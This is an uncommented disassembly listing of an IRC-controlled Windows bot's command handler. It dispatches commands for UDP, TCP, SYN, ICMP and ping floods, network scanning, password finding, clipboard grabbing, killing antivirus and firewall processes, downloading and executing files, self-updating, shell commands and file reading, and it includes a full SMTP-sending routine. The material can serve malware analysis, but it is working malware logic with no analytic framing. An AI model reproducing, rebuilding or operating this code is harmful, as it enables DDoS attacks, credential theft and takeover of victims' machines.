loc_409E18: ; CODE XREF: sub_408A18+13E6�j
push 4
mov edi, eax
mov esi, offset aWho ; "who"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40A157
cmp [ebp+var_8], edx
jnz short loc_409E4B
push edx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_409E4B: ; CODE XREF: sub_408A18+1417�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409E50: ; CODE XREF: sub_408A18+147F�j
cmp byte ptr [edi], 0
lea eax, [edi+1]
jnz short loc_409E5D
mov eax, offset aEmpty ; "<Empty>"
loc_409E5D: ; CODE XREF: sub_408A18+143E�j
push eax
push esi
lea eax, [ebp+var_2F0]
push offset aD_S ; "%d. %s"
push eax
call sub_4145E5
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_409E50
push offset aMainLoginListC ; "[MAIN]: Login list complete."
call sub_401EFF
mov eax, [ebp+var_1C]
pop ecx
loc_409EA7: ; CODE XREF: sub_408A18+239E�j
; sub_408A18+5033�j
mov ecx, [ebp+ebx+var_98]
test ecx, ecx
mov [ebp+var_14], ecx
jz loc_408C96
push 8
mov edi, eax
mov esi, offset aAdvscan ; "advscan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E0C4
push 4
mov edi, eax
mov esi, offset aAsc ; "asc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E0C4
push 9
mov edi, eax
mov esi, offset aUdpflood ; "udpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DF7B
push 4
mov edi, eax
mov esi, offset aUdp ; "udp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DF7B
push 2
mov edi, eax
mov esi, offset aU ; "u"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DF7B
push 0Ah
mov edi, eax
mov esi, offset aPingflood ; "pingflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DE3F
push 5
mov edi, eax
mov esi, offset aPing_0 ; "ping"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DE3F
push 2
mov edi, eax
mov esi, offset aP ; "p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DE3F
push 9
mov edi, eax
mov esi, offset aTcpflood ; "tcpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DC54
push 4
mov edi, eax
mov esi, offset aTcp ; "tcp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DC54
push 6
mov edi, eax
mov esi, offset aEmail ; "email"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40DA5E
mov eax, [ebp+ebx+var_A4]
lea edx, [ebp+var_AAC]
sub edx, eax
loc_409FA4: ; CODE XREF: sub_408A18+1594�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_409FA4
push [ebp+ebx+var_A0]
call sub_414972
mov esi, eax
mov eax, [ebp+ebx+var_9C]
lea edx, [ebp+var_2070]
pop ecx
sub edx, eax
loc_409FCC: ; CODE XREF: sub_408A18+15BC�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_409FCC
mov eax, [ebp+var_14]
lea edx, [ebp+var_1520]
sub edx, eax
loc_409FE1: ; CODE XREF: sub_408A18+15D1�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_409FE1
push offset asc_420AE8 ; " "
push offset a_ ; "_"
push [ebp+ebx+var_94]
call sub_40668C
add esp, 0Ch
lea edx, [ebp+var_1D70]
loc_40A00A: ; CODE XREF: sub_408A18+15FA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40A00A
lea eax, [ebp+var_2400]
push eax
push 101h
call dword_4357F8 ; WSAStartup
lea eax, [ebp+var_AAC]
push eax
call dword_435848 ; gethostbyname
push 6
push 1
push 2
mov ebx, eax
call dword_4357E8 ; socket
mov edi, eax
mov [ebp+var_D8], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
push esi
mov [ebp+var_D4], eax
call dword_435934 ; ntohs
mov [ebp+var_D6], ax
lea eax, [ebp+var_1D70]
push eax
lea eax, [ebp+var_2070]
push eax
lea eax, [ebp+var_1D70]
push eax
lea eax, [ebp+var_1520]
push eax
lea eax, [ebp+var_2070]
push eax
lea eax, [ebp+var_2800]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_4145E5
add esp, 1Ch
push 10h
lea eax, [ebp+var_D8]
push eax
push edi
call dword_4357A0 ; connect
xor ebx, ebx
push ebx
mov esi, 100h
push esi
lea eax, [ebp+var_1C6C]
push eax
push edi
call dword_43575C ; recv
lea eax, [ebp+var_1C6C]
lea ecx, [eax+1]
loc_40A0CE: ; CODE XREF: sub_408A18+16BB�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40A0CE
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_2800]
push eax
push edi
call dword_43587C ; send
push ebx
push esi
lea eax, [ebp+var_1C6C]
push eax
push edi
call dword_43575C ; recv
push edi
call dword_4358F4 ; closesocket
call dword_435900 ; WSACleanup
lea eax, [ebp+var_1520]
push eax
lea eax, [ebp+var_2F0]
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40A140
push ebx
loc_40A125: ; CODE XREF: sub_408A18+3986�j
; sub_408A18+3A2F�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
loc_40A138: ; CODE XREF: sub_408A18+3170�j
call sub_4056FB
add esp, 14h
loc_40A140: ; CODE XREF: sub_408A18+170A�j
; sub_408A18+3158�j ...
mov esi, [ebp+arg_24]
loc_40A143: ; CODE XREF: sub_408A18+39C4�j
; sub_408A18+39E7�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
pop ecx
mov eax, esi
jmp loc_408C99
; ---------------------------------------------------------------------------
loc_40A157: ; CODE XREF: sub_408A18+140E�j
push 8
mov edi, eax
mov esi, offset aGetclip ; "getclip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D03D
push 3
mov edi, eax
mov esi, offset aGc ; "gc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D03D
push 9
mov edi, eax
mov esi, offset aFlusharp ; "flusharp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D012
push 5
mov edi, eax
mov esi, offset aFarp ; "farp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D012
push 9
mov edi, eax
mov esi, offset aFlushdns ; "flushdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFE2
push 5
mov edi, eax
mov esi, offset aFdns ; "fdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFE2
push 0Ah
mov edi, eax
mov esi, offset aCurrentip ; "currentip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFA8
push 4
mov edi, eax
mov esi, offset aCip ; "cip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CFA8
push 0Dh
mov edi, eax
mov esi, offset aRloginserver ; "rloginserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE6F
push 7
mov edi, eax
mov esi, offset aRlogin ; "rlogin"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CE6F
push 0Bh
mov edi, eax
mov esi, offset aHttpserver ; "httpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CCEE
push 5
mov edi, eax
mov esi, offset aHttp ; "http"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CCEE
push 0Bh
mov edi, eax
mov esi, offset aTftpserver ; "tftpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB97
push 5
mov edi, eax
mov esi, offset aTftp ; "tftp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB97
push 9
mov edi, eax
mov esi, offset aFindpass ; "findpass"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CAEF
push 3
mov edi, eax
mov esi, offset aFp ; "fp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CAEF
push 8
mov edi, eax
mov esi, offset aScanall ; "scanall"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C7BA
push 3
mov edi, eax
mov esi, offset aSa ; "sa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C7BA
mov ecx, [ebp+ebx+var_A4]
test ecx, ecx
mov [ebp+var_C], ecx
jz loc_408C96
push 5
mov edi, eax
mov esi, offset aNick_0 ; "nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C795
push 2
mov edi, eax
mov esi, offset aN ; "n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C795
push 5
mov edi, eax
mov esi, offset aJoin ; "join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C771
push 2
mov edi, eax
mov esi, offset aJ ; "j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C771
push 5
mov edi, eax
mov esi, offset aPart_0 ; "part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C757
push 3
mov edi, eax
mov esi, offset aPt ; "pt"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C757
push 4
mov edi, eax
mov esi, offset aRaw ; "raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C720
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C720
push 0Bh
mov edi, eax
mov esi, offset aKillthread ; "killthread"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C666
push 2
mov edi, eax
mov esi, offset aK ; "k"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C666
push 7
mov edi, eax
mov esi, offset aC_quit ; "c_quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C5B8
push 4
mov edi, eax
mov esi, offset aC_q ; "c_q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C5B8
push 0Ah
mov edi, eax
mov esi, offset aC_rndnick ; "c_rndnick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C567
push 5
mov edi, eax
mov esi, offset aC_rn ; "c_rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C567
push 7
mov edi, eax
mov esi, offset aPrefix ; "prefix"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C54E
push 3
mov edi, eax
mov esi, offset aPr ; "pr"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C54E
push 5
mov edi, eax
mov esi, offset aOpen ; "open"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C518
push 2
mov edi, eax
mov esi, offset aO ; "o"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C518
push 7
mov edi, eax
mov esi, offset aServer ; "server"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4EF
push 3
mov edi, eax
mov esi, offset aSe ; "se"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4EF
push 4
mov edi, eax
mov esi, offset aDns ; "dns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C47F
push 3
mov edi, eax
mov esi, offset aDn ; "dn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C47F
push 9
mov edi, eax
mov esi, offset aKillproc ; "killproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C44C
push 3
mov edi, eax
mov esi, offset aKp ; "kp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C44C
push 0Ch
mov edi, eax
mov esi, offset aKilldelproc ; "killdelproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C404
push 4
mov edi, eax
mov esi, offset aKdp ; "kdp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C404
push 5
mov edi, eax
mov esi, offset aKill ; "kill"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3A3
push 3
mov edi, eax
mov esi, offset aKi ; "ki"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3A3
push 7
mov edi, eax
mov esi, offset aDelete ; "delete"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C351
push 4
mov edi, eax
mov esi, offset aDel ; "del"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C351
push 5
mov edi, eax
mov esi, offset aList_0 ; "list"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C331
push 3
mov edi, eax
mov esi, offset aLi ; "li"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C331
push 8
mov edi, eax
mov esi, offset aMirccmd ; "mirccmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2B8
push 5
mov edi, eax
mov esi, offset aMirc ; "mirc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C2B8
push 4
mov edi, eax
mov esi, offset aCmd ; "cmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C25C
push 3
mov edi, eax
mov esi, offset aCm ; "cm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C25C
push 9
mov edi, eax
mov esi, offset aReadfile ; "readfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C1C8
push 3
mov edi, eax
mov esi, offset aRf ; "rf"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C1C8
push 4
mov edi, eax
mov esi, offset aNet ; "net"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40A872
xor eax, eax
cmp dword_435948, eax
jz short loc_40A5F9
cmp dword_435970, eax
jz short loc_40A5F9
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_40A867
; ---------------------------------------------------------------------------
loc_40A5F9: ; CODE XREF: sub_408A18+1BCD�j
; sub_408A18+1BD5�j
cmp [ebp+var_14], eax
jz loc_40C2FC
mov eax, [ebp+ebx+var_A0]
and [ebp+arg_0], 0
test eax, eax
mov [ebp+var_10], eax
jz short loc_40A622
push eax
push [ebp+var_14]
call sub_4150B0
pop ecx
pop ecx
mov [ebp+arg_0], eax
loc_40A622: ; CODE XREF: sub_408A18+1BFA�j
mov edx, [ebp+var_C]
push 6
mov edi, edx
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A690
cmp [ebp+var_10], eax
jz short loc_40A65E
push [ebp+arg_0]
push 3
loc_40A63F: ; CODE XREF: sub_408A18+1C8D�j
; sub_408A18+1CA4�j ...
call sub_4077A8
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_4145E5
add esp, 14h
jmp loc_40C2FC
; ---------------------------------------------------------------------------
loc_40A65E: ; CODE XREF: sub_408A18+1C20�j
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_406EE3
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40A686
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40C2F4
; ---------------------------------------------------------------------------
loc_40A686: ; CODE XREF: sub_408A18+1C62�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40C2F4
; ---------------------------------------------------------------------------
loc_40A690: ; CODE XREF: sub_408A18+1C1B�j
push 5
mov edi, edx
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A6A7
push [ebp+arg_0]
push 4
jmp short loc_40A63F
; ---------------------------------------------------------------------------
loc_40A6A7: ; CODE XREF: sub_408A18+1C86�j
push 6
mov edi, edx
mov esi, offset aPause ; "pause"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A6BE
push [ebp+arg_0]
push 5
jmp short loc_40A63F
; ---------------------------------------------------------------------------
loc_40A6BE: ; CODE XREF: sub_408A18+1C9D�j
push 9
mov edi, edx
mov esi, offset aContinue ; "continue"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A6D8
push [ebp+arg_0]
push 6
jmp loc_40A63F
; ---------------------------------------------------------------------------
loc_40A6D8: ; CODE XREF: sub_408A18+1CB4�j
push 7
mov edi, edx
mov esi, offset aDelete ; "delete"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A6F2
push [ebp+arg_0]
push 1
jmp loc_40A63F
; ---------------------------------------------------------------------------
loc_40A6F2: ; CODE XREF: sub_408A18+1CCE�j
push 6
mov edi, edx
mov esi, offset aShare ; "share"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A776
cmp [ebp+var_10], eax
jz short loc_40A742
cmp [ebp+var_458], al
jz short loc_40A717
push eax
push [ebp+var_10]
push 1
jmp short loc_40A723
; ---------------------------------------------------------------------------
loc_40A717: ; CODE XREF: sub_408A18+1CF5�j
push [ebp+ebx+var_9C]
push [ebp+var_10]
push 0
loc_40A723: ; CODE XREF: sub_408A18+1CFD�j
call sub_407820
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_4145E5
add esp, 18h
jmp loc_40C2FC
; ---------------------------------------------------------------------------
loc_40A742: ; CODE XREF: sub_408A18+1CED�j
push 0
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4078DE
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40A76C
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40C2F4
; ---------------------------------------------------------------------------
loc_40A76C: ; CODE XREF: sub_408A18+1D48�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40C2F4
; ---------------------------------------------------------------------------
loc_40A776: ; CODE XREF: sub_408A18+1CE8�j
push 5
mov edi, edx
mov esi, offset aUser ; "user"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40A818
cmp [ebp+var_10], eax
jz short loc_40A7E4
cmp [ebp+var_458], al
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
jz short loc_40A7AB
push eax
push [ebp+var_10]
push 1
jmp short loc_40A7C5
; ---------------------------------------------------------------------------
loc_40A7AB: ; CODE XREF: sub_408A18+1D89�j
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40A7BE
push ebx
push [ebp+var_10]
push 0
jmp short loc_40A7C5
; ---------------------------------------------------------------------------
loc_40A7BE: ; CODE XREF: sub_408A18+1D9C�j
push 0
push [ebp+var_10]
push 2
loc_40A7C5: ; CODE XREF: sub_408A18+1D91�j
; sub_408A18+1DA4�j
call sub_4079FD
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_4145E5
add esp, 24h
jmp loc_40C2FC
; ---------------------------------------------------------------------------
loc_40A7E4: ; CODE XREF: sub_408A18+1D75�j
push 0
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_407AC7
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40A80E
push offset aNetUserListCom ; "[NET]: User list completed."
jmp loc_40C2F4
; ---------------------------------------------------------------------------
loc_40A80E: ; CODE XREF: sub_408A18+1DEA�j
push offset aNetUserListFai ; "[NET]: User list failed."
jmp loc_40C2F4
; ---------------------------------------------------------------------------
loc_40A818: ; CODE XREF: sub_408A18+1D6C�j
push 5
mov edi, edx
mov esi, offset aSend ; "send"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40A862
cmp [ebp+var_10], eax
jz short loc_40A85B
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4076EC
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_4145E5
add esp, 1Ch
jmp loc_40C2FC
; ---------------------------------------------------------------------------
loc_40A85B: ; CODE XREF: sub_408A18+1E13�j
push offset aNetNoMessageSp ; "[NET]: No message specified."
jmp short loc_40A867
; ---------------------------------------------------------------------------
loc_40A862: ; CODE XREF: sub_408A18+1E0E�j
push offset aNetCommandUnkn ; "[NET]: Command unknown."
loc_40A867: ; CODE XREF: sub_408A18+1BDC�j
; sub_408A18+1E48�j
lea eax, [ebp+var_2F0]
jmp loc_40C2F4
; ---------------------------------------------------------------------------
loc_40A872: ; CODE XREF: sub_408A18+1BBF�j
push 8
mov edi, eax
mov esi, offset aGethost ; "gethost"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0E3
push 3
mov edi, eax
mov esi, offset aGh ; "gh"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0E3
loc_40A89A: ; DATA XREF: .data:0042CD94�o
; .data:0042CDD8�o ...
push 0Bh
mov edi, eax
mov esi, offset aAvfwkiller ; "avfwkiller"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40A9A0
mov edi, [ebp+var_C]
push 6
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40A973
lea eax, [ebp+var_2F0]
push offset aAvfwAvFwBotKil ; "[AVFW]: AV/FW/BOT Killer active."
push eax
call sub_4145E5
push [ebp+ebx+var_A0]
xor edi, edi
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
push 1
push edi
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4126A7
push edi
lea eax, [ebp+var_2F0]
push 1
push eax
call sub_412471
add esp, 34h
mov esi, eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40861B
push edi
push edi
call ds:dword_42000C ; CreateThread
imul esi, 234h
cmp eax, edi
mov dword_436694[esi], eax
jnz short loc_40A94C
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aAvfwFailedToSt ; "[AVFW]: Failed to start AV/FW killer th"...
push eax
call sub_4145E5
add esp, 0Ch
loc_40A94C: ; CODE XREF: sub_408A18+1F17�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
cmp [ebp+var_8], edi
pop ecx
jnz loc_408C96
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
jmp loc_40D19D
; ---------------------------------------------------------------------------
loc_40A973: ; CODE XREF: sub_408A18+1EA5�j
mov edi, [ebp+var_C]
push 5
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408C96
push [ebp+ebx+var_A0]
push 1
push offset aKillerThread ; "Killer Thread"
push offset aAvfw ; "[AVFW]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_408A18+1E90�j
mov ecx, [ebp+ebx+var_A0]
test ecx, ecx
mov [ebp+var_10], ecx
jz loc_408C96
push 9
mov edi, eax
mov esi, offset aAddalias ; "addalias"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C070
push 3
mov edi, eax
mov esi, offset aAa ; "aa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C070
push 8
mov edi, eax
mov esi, offset aPrivmsg_0 ; "privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C005
push 3
mov edi, eax
mov esi, offset aPm_0 ; "pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C005
push 7
mov edi, eax
mov esi, offset aAction ; "action"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF82
push 2
mov edi, eax
mov esi, offset aA_1 ; "a"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF82
push 6
mov edi, eax
mov esi, offset aCycle ; "cycle"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF1C
push 3
mov edi, eax
mov esi, offset aCy ; "cy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF1C
push 5
mov edi, eax
mov esi, offset aMode ; "mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BEE2
push 2
mov edi, eax
mov esi, offset aM ; "m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BEE2
push 6
mov edi, eax
mov esi, offset aC_raw ; "c_raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE73
push 4
mov edi, eax
mov esi, offset aC_r ; "c_r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE73
push 7
mov edi, eax
mov esi, offset aC_mode ; "c_mode"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDED
push 4
mov edi, eax
mov esi, offset aC_m ; "c_m"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDED
push 7
mov edi, eax
mov esi, offset aC_nick ; "c_nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD7C
push 4
mov edi, eax
mov esi, offset aC_n ; "c_n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD7C
push 7
mov edi, eax
mov esi, offset aC_join ; "c_join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD54
push 4
mov edi, eax
mov esi, offset aC_j ; "c_j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD54
push 7
mov edi, eax
mov esi, offset aC_part ; "c_part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BCEE
push 4
mov edi, eax
mov esi, offset aC_p ; "c_p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BCEE
push 7
mov edi, eax
mov esi, offset aRepeat ; "repeat"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BC2A
push 3
mov edi, eax
mov esi, offset aRp ; "rp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BC2A
push 6
mov edi, eax
mov esi, offset aDelay ; "delay"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB8D
push 3
mov edi, eax
mov esi, offset aDe ; "de"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB8D
push 7
mov edi, eax
mov esi, offset aUpdate ; "update"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B9B6
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B9B6
push 8
mov edi, eax
mov esi, offset aExecute ; "execute"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B913
push 2
mov edi, eax
mov esi, offset aE ; "e"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B913
push 9
mov edi, eax
mov esi, offset aFindfile ; "findfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B803
push 3
mov edi, eax
mov esi, offset aFf ; "ff"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B803
push 7
mov edi, eax
mov esi, offset aRename ; "rename"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B7AB
push 3
mov edi, eax
mov esi, offset aMv ; "mv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B7AB
push 0Ah
mov edi, eax
mov esi, offset aIcmpflood ; "icmpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B679
push 5
mov edi, eax
mov esi, offset aIcmp ; "icmp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B679
mov ecx, [ebp+ebx+var_9C]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_408C96
push 6
mov edi, eax
mov esi, offset aClone_0 ; "clone"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B58B
push 2
mov edi, eax
mov esi, offset aC ; "c"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B58B
push 9
mov edi, eax
mov esi, offset aDdos_syn ; "ddos.syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B468
push 9
mov edi, eax
mov esi, offset aDdos_ack ; "ddos.ack"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B468
push 0Ch
mov edi, eax
mov esi, offset aDdos_random ; "ddos.random"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B468
push 9
mov edi, eax
mov esi, offset aSynflood ; "synflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B37B
push 4
mov edi, eax
mov esi, offset aSyn ; "syn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B37B
push 9
mov edi, eax
mov esi, offset aDownload ; "download"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B1D9
push 3
mov edi, eax
mov esi, offset aDl ; "dl"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B1D9
push 9
mov edi, eax
mov esi, offset aRedirect ; "redirect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0DC
push 3
mov edi, eax
mov esi, offset aRd ; "rd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0DC
push 5
mov edi, eax
mov esi, offset aScan ; "scan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AFE6
push 3
mov edi, eax
mov esi, offset aSc ; "sc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AFE6
push 0Ah
mov edi, eax
mov esi, offset aC_privmsg ; "c_privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEF0
push 5
mov edi, eax
mov esi, offset aC_pm ; "c_pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEF0
push 9
mov edi, eax
mov esi, offset aC_action ; "c_action"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40ADBC
push 4
mov edi, eax
mov esi, offset dword_426F90
pop ecx
xor edx, edx
repe cmpsb
jnz loc_409EA7
loc_40ADBC: ; CODE XREF: sub_408A18+238E�j
push [ebp+var_C]
call sub_414972
imul eax, 234h
cmp byte_436698[eax], 0
pop ecx
jz loc_40E538
mov edi, [ebp+var_14]
test edi, edi
jz loc_40E538
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40ADE9: ; CODE XREF: sub_408A18+23D6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40ADE9
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_C]
lea ecx, [eax+1]
loc_40ADFA: ; CODE XREF: sub_408A18+23E7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40ADFA
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
